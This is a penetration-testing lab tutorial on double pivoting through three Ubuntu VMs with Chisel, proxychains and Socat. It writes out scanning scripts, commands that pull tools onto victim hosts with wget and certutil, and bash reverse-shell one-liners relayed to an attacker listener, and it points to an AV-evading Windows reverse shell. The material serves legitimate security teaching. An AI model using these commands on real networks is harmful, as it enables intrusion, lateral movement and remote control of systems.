2.5.2 Pivoting Example (3 Targets)

What is Pivoting?

Imagine an attacker gains access to one system in a network, like a thief entering a house through an unlocked window. This initial foothold allows them to "pivot" within the network, using the compromised system as a stepping stone.

By exploiting weaknesses and leveraging shared resources, they can move laterally, bypassing security measures like firewalls, just like the thief using a hidden key to access other rooms. This allows them to reach and potentially control additional systems, gaining access to more valuable resources or information within the network. While malicious actors use this technique for harmful purposes, ethical hackers (pen-testers) also employ pivoting to assess network security vulnerabilities.

Explore Hidden Networks With Double PivotingPentest Blog

Setting Lab

1) Download one of following virtualization platform:

• VirtualBox: https://www.virtualbox.org/wiki/Downloads

• VmWare: https://www.vmware.com/content/vmware/vmware-published-sites/us/products/workstation-player/workstation-player-evaluation.html.html

• Qemu: https://www.qemu.org/download/

2) Download one of these Linux OS (PT distribution is preferred):

• Kali Linux (OVA): https://www.kali.org/get-kali/#kali-virtual-machines

• ParrotOS (OVA): https://parrotsec.org/docs/virtualization/install-parrot-on-virtualbox/

3) Download Ubuntu Server OS (we will use it for the three target machines):

Ubuntu Server: https://ubuntu.com/download/server

Configuration of Lab

1) Install virtualization platform (in my case VirtualBox)

2) Create three different NAT Networks with DHCP enabled:

• Nat1 (10.10.10.0/24)

• Nat2 (20.20.20.0/24)

• Nat3 (30.30.30.0/24)

3) Istanciate attacker machine (Kali) and assign: normal NAT network to access to internet (optional) and NAT1 interface:

4) Istanciate Target1 (Ubuntu Server) and assign: NAT1 and NAT2 interfaces:

5) Istanciate Target2 (Ubuntu Server) and assign: NAT2 and NAT3 interfaces:

6) Istanciate Target3 (Ubuntu Server) and assign only NAT3 interface:

7) Run all machines! ⚡

Network schema

Hostname	NAT 1	NAT 2	NAT 3
Attacker Machine (Kali Linux)	10.10.10.4
Target 1 (Ubuntu)	10.10.10.5	20.20.20.7
Target 2 (Ubuntu)		20.20.20.4	30.30.30.5
Target 3 (Ubuntu)			30.30.30.4

For each targets we can create a simple index.html file, to differenciate each and host it on port 80 using python:

#target 1
echo "<h1>Target 1</h1>" > index.html #create a static html page with text: Target 1
sudo python3 -m http.server 80
#target 2
echo "<h1>Target 2</h1>" > index.html #create a static html page with text: Target 2
sudo python3 -m http.server 80
#target 3
echo "<h1>Target 3</h1>" > index.html #create a static html page with text: Target 3
sudo python3 -m http.server 80

Reconnaissance

We talk about pivoting when, after having exploited a victim machine, we find another internal network inside it. Therefore it is necessary to know the context well in the ways illustrated below.

Hosts Discovery on internal network

Once we have found the internal hosts we can do 3 things:

• Do an arp-scan on localnet

• Create a bash script to find open ports of the new IP

• Upload a portable nmap binary

static-binaries/binaries at master · andrew-d/static-binariesGitHub

List of static binaries

ARP-Scan

Execute an arp-scan for host discovering in localnet:

arp-scan -I eth1 --localnet

Host and Port Discovery using scripts

Host Discovery

Linux

for i in $(seq 254); do ping 10.10.10.${i} -c1 W1 & done | grep from

for i in $(seq 254) -> do cicle 254 times, using i as cycle iterator

ping 10.0.2.${i} -c1 W1 & -> do ping request at current IP (based on iterator value) sending only 1 packet (-c1), with 1 sec of timeout(-W1), all in background (&).

do and done -> delimiter the beginning and the ending of code block for which iteration

| grep from -> filter output of last commands displaying only output that contains answers received at ping request

We can use this similar solution:

#!/bin/bash
for i in $(seq 1 254); do
       timeout 1 bash -c "ping -c 1 10.10.10.$i" &>/dev/null && echo " 10.10.10.$i is Active" &
done; wait

Windows

ipconfig # IP list
arp -a # To see network interfaces

GitHub - BornToBeRoot/PowerShell_IPv4NetworkScanner: Powerful asynchronus IPv4 network scanner for PowerShellGitHub

Install IPv4 Network Scanner to scan the network range

.\IPv4NetworkScanner.ps1 -StartIPv4Address 10.10.10.0 -EndIPv4Address 10.10.10.254

Open Ports Discovery

Linux

#!/bin/bash
for port in $(seq 1 65535); do
        timeout 1 bash -c "echo '' > /dev/tcp/<IP>/$port" &>/dev/null && echo "[*] $port Port is Open" &
done; wait

Windows

GitHub - BornToBeRoot/PowerShell_IPv4PortScanner: Powerful asynchronus IPv4 port scanner for PowerShellGitHub

Check open port of network range

.\IPv4PortScanner .ps1 -ComputerName <name> -StartPort 1 -EndPort 500 | ft

Host and Port Discovery using Nmap binary

Simulating that we've access to first victim machine using SSH protocol, we need to download a portable scanning program (as nmap) on our attacker machine (kali) and transfer it on victim machine via SSH.

Go to this github repo, that contains more useful static binary resources (nmap, python, socat, netcat, etc) and copy following URL:

https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap

download it on our attacker machine (Kali), assign exe privilege:

wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap #download nmap binary
chmod +x nmap #give execution permission

and copy binary to victim machina via SSH:

scp nmap pivot@IP:/tmp #copy via ssh on /tmp victim machine directory 

or using hosting it on a python web server and downloading it on victim machine:

python3 -m http.server 80 #on attacker machine, on the same directory of nmap
wget http://10.10.10.4/nmap #if victim machine has Linux OS
certutil -urlcache -split -f http://10.10.10.4/nmap #if victim machine has Windows OS

Now, we've transferred nmap on victim/pivot machine and we can run it there:

./nmap IP #we need to use -Pn flag to scan Windows machines

Pivoting phase

Now, we've scanning tool (bash script or nmap) to discover network and other subnets of victim/pivot machine, but we can't do a simple ping or scan to IP regarding external subnets from our attacker machine (kali).

To give a link between attacker machine and external iPs we need to using pivoting techniques.

Tools for Pivoting

• Chisel

• Metasploit (auxiliary/server/socks_proxy)

• Logolo-ng

• Socat

• Netsh

Chisel

Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.

GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTPGitHub

We are going to use Chisel to help us reach Target machine from our Attacker machine.

We also need to install proxychains, if it is not already installed on our Attacker machine, by running the following command.

#Kali
sudo apt-get -y install proxychains #download and install proxychains
curl https://i.jpillora.com/chisel! | bash #download and install binary
ln -s /usr/local/bin/chisel chisel #create a symbolic link for Chisel binary path
chmod +x chisel #give execution permission (do it on both machines)

Access to Target X (we'll do it for target 1, 2 and 3):

In our case we're accessing through machines via SSH and using following credentials: ubuntu:ubuntu

Now, we've Chisel on our Kali attacker machine (server), and we need to transfer it to victim machine target1 (client) for establish a connection.

Do it using a Python HTTP Server on port 80, on our attacker machine and download it on attacker machine:

#Kali
python3 -m http.server 80 #on attacker machine, on the same directory of chisel

#Target 1
ssh ubuntu@10.10.10.5 #access to target 1
wget http://10.10.10.4/chisel #download chisel (if victim machine has Linux OS)
certutil -urlcache -split -f http://10.10.10.4/chisel #download chisel (if victim machine has Windows OS)
chmod +x chisel #give execution permission

or transferring using SSH via:

scp chisel kali@10.10.10.5:/tmp #copy via ssh on /tmp victim machine directory 
chmod +x chisel #give execution permission (do it on both machines) 

or transferring using Curl:

curl 10.10.10.4/chisel -o chisel

Finally, we can establish connection between attacker (Kali) and victim using chisel (Target 1):

Attacker Machine / Server

Solution 1 (i suggest it)

./chisel server --reverse -p 33 #on Kali

Solution 2

./chisel server --socks5 --reverse #on Kali

• PORT = port for the Chisel traffic

• socks5 = to setup a SOCKS5 proxy

• reverse = to tell Chisel to wait for a connection from a client

Victim Machine / Client

Solution 1(i suggest it)

Via socks5 bring us all ports:

./chisel client 10.10.10.4:33 R:socks

Solution 2

Bringing only one port which would be like this:

./chisel client <Attacker_IP>:2000 R:80:<Victim_IP>:80

Solution 3

./chisel client --fingerprint <finger_of_chisel_server> <Attacker_IP>:<Listening_Attacker_Port> R:8000:<Victim_IP>:80

• IP = The IP address of your Chisel server

• PORT = The port you set on your Chisel sever

• R:socks = enables the reverse SOCKS proxy

The connection will have been opened on the local port of our machine through 1080.

Rename terminal tabs is a best practies to facilitate understanding!

Rename tabs with a significant name

Setting Proxychains

First, check that you have proxychains↗ installed. It comes preinstalled in Kali Linux or Parrot. With root privileges edit the file /etc/proxychains4.conf. At the bottom, you should add the following line:

echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf #it adds IP and port in listening mode on chisel attacker machine

/etc/proxychains4.conf

Now we can talk directly with attacker machine and do a scan preceding proxychains -q before every command. The -q is for quiet mode since most attackers won’t need verbose proxy traffic.

proxychains nmap -p80 --open --min-rate 4000 -v <Victim_IP> -sT -Pn 
proxychains curl <Victim_IP>:80
proxychains xfreerdp /v:<Victim_IP> /u:Administrator

The traffic flows into port 1080 on your machine and out on your jump host, which has established a connection back to your listener on the port you specified when executing chisel server.

Setting Proxy (browser use)

If we want to set proxy to see webpage using browser, we need to configure a proxy.

Foxy Proxy

We can use an extension for browser such as Foxy Proxy.

Install version for dedicated browser (Firefox, Chrome, etc)

Add Proxy -> Proxy Type: SOCKS5, Proxy IP address: 127.0.0.1, Port: <Listening_Attacker_Port> and save

Turn on FoxyProxy an go on website directly using IP pivot machine.

Use of proxychains

Checking network interface (ip a) on target 1, we can discover an host with 20.20.20.4 IP and reach out it only using proxychains before commands:

Without use of proxychains (on terminal) and proxy (on browser) we can't reach out victim machine!

Now using Kali attacker machine we can see hosts on second network interface 20.20.20.0/24 (present on target 1 and 2).

and we can see that's third network interface 30.30.30.0/24 (target 3 -> 30.30.30.5).

Socat

Good, but the matter is that Kali attacker machine isn't reachable by target2:

Bad situation in a PT, where we need to spawn a reverse shell. To solve this problem a tool called Socat comes in handy.

static-binaries/socat at master · andrew-d/static-binariesGitHub

We are going to use Socat to help us reach Attacker machine from our Target/Victim machine and spawn a shell.

#Kali
curl https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -o socat #download Socat
chmod +x socat #give execution permission (do it on both machines)
#transfer Socat on victim machine / target 1
python3 -m http.server 80

#download on target 1 using wget or similar methods
#Target 1
wget 10.10.10.4/socat
chmod +x socat

#Target 1
./socat tcp-l:1111,fork,reuseaddr tcp:10.10.10.4:111 #tcp-l: listening port, send data to tcp:attacker:port

Now, we've a reverse connection, and if we listening on Kali machine using on port 111 and we spawn a reverse shell on target 2 (using Target 2's IP of 2nd net interface in common between target 1 and 2), we obtain a target 2 session on Kali machine.

Online - Reverse Shell Generator

#Kali
nc -nlvp 111 #listening on port 111
#Target 2
sh -i >& /dev/tcp/20.20.20.7/1111 0>&1 #Bash -i reverse shell with IP target 1 and socat listening port 1111

All right! We stop listening on the Kali and to reach the third machine, we've to do the same procedure.

_______________________________________

We need Chisel and Socat on target 2, then we transfer it as always, but using target 1 machine and not Kali.

#Target 1
python3 -m http.server 80 #target 1, on the same directory of chisel

#Target 2
proxychains ssh ubuntu@20.20.20.4 #access to target 2 from kali
wget http://20.20.20.7/* #download chisel and socat (if victim machine has Linux OS)
certutil -urlcache -split -f http://20.20.20.7/* #download chisel and socat (if victim machine has Windows OS)
chmod +x chisel #give execution permission
chmod +x socat #give execution permission

Then, we need to open a new tunnel connection on Kali machine, therefore we execute a 2nd session of target 1 on a different port of socks5.

Setting proxychains

With root privileges edit the file /etc/proxychains4.conf. At the bottom, you should add the following line:

echo "socks5 127.0.0.1 5555" >> /etc/proxychains4.conf #it adds IP and port in listening mode on chisel attacker machine

/etc/proxychains4.conf

If we'll give an error during next connections, we need to insert line to the top line of the previous request (as photo) or if "dynamic_chain" option is commented out and strict_chain" option is uncommented.

Execute socat on target 1 using a different port on listening and attacker machine IP and Port:

#Target 1
./socat tcp-l:2222,fork,reuseaddr tcp:10.10.10.4:111 #tcp-l: listening port, send data to tcp:attacker:port

while we execute chisel on target 2 (using Target 1's IP of 2nd net interface in common between target 1 and 2, in addition we specify proxychains socks port: with R:5555:socks):

#Target 2
./chisel client 20.20.20.7:2222 R:5555:socks

well done, we obtained a new session tunnel on Kali:

Now, we've visibility with the target 3.

#Kali
proxychains curl 30.30.30.4

of course, to see webpage via browser we need to reconfigure proxy settings or foxy proxy.

Very good, we can access to target 3 using: proxychains ssh ubuntu@30.30.30.4

But we've always the same problem, we can't reach out kali from target 3 and spawn a rev shell.

We can solve it establish a new session of socat on target 2, which will establish a connection starting from machine 2, passing through 1, until arriving at kali.

#Target 2
./socat tcp-l:3333,fork,reuseaddr tcp:20.20.20.7:4444 #tcp-l: listening port, send data to tcp:attacker:port
#Target 1
./socat tcp-l:4444,fork,reuseaddr tcp:10.10.10.4:2222  #tcp-l: listening port, send data to tcp:attacker:port

Reverse Shell

Online - Reverse Shell Generator

We create a bash reverse shell using target 2 IP machine (on the same subnet of target 3), and listening on kali machine using netcat:

#Kali
nc -nvlp 2222 #same port of socat on target 1
#Target 3
sh -i >& /dev/tcp/30.30.30.5/3333 0>&1

Great, we're in target 3 machine!

In addition, we can use this tool to create a powershell reverse shell for Windows machine to communicate back to attacker machine (kali).

GitHub - t3l3machus/hoaxshell: An unconventional Windows reverse shell, currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic.GitHub

python hoaxshell.py -s <Victim_IP> -p 9999

it generates a reverse shell payload on execute on windows victim machine using powershell.

It permits us to obtain a reverse shell connection with windows victim machine on our attacker kali machine.

Metasploit

Pivoting

Pivoting - Metasploit UnleashedOffSec

Pivoting

Port Forwarding

Metasploit Unleashed - Free Online Ethical Hacking Course | OffSecOffSec

Portfwd